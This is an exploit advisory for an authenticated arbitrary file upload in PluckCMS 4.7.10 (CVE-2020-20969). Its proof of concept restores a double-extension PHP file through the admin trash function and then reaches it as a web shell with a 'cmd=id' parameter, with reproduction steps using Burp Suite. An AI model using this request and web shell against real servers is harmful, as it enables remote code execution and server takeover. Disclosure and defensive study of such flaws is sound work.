PluckCMS 4.7.10 Arbitrary File Upload

PluckCMS version 4.7.10 (and potentially earlier) is vulnerable to an PluckCMS version 4.7.10 (and potentially earlier) is vulnerable to an Arbitrary File Upload.

This critical flaw allows an authenticated administrator to upload malicious files. The vulnerability stems from insufficient validation of file types during the upload process.

By exploiting this, an attacker can bypass security checks and upload files such as PHP web shells. These uploaded files can then be executed on the server.

This leads to Remote Code Execution (RCE), granting the attacker full control over the compromised web server. Users are strongly advised to upgrade PluckCMS to a patched version to mitigate this risk.

# Exploit Title: PluckCMS 4.7.10 - Unrestricted File Upload
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/pluck-cms/pluck/
# Software Link: https://github.com/pluck-cms/pluck/
# Version: 4.7.10
# Tested on: Windows
# CVE : CVE-2020-20969


Proof Of Concept
GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1
Host: pluck
Cookie: PHPSESSID=[valid_session_id]

**Access Method:**
http://pluck/files/exploit_copy.php?cmd=id

**Additional Conditions:**
1. Valid session cookie required (authenticated attack)
2. File `exploit.php.jpg` must exist in `data/trash/files/` before restoration
3. Server must not filter double extensions during file upload/trash operations


Steps to Reproduce
Log in as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
The file will be restored and can be accessed through the url.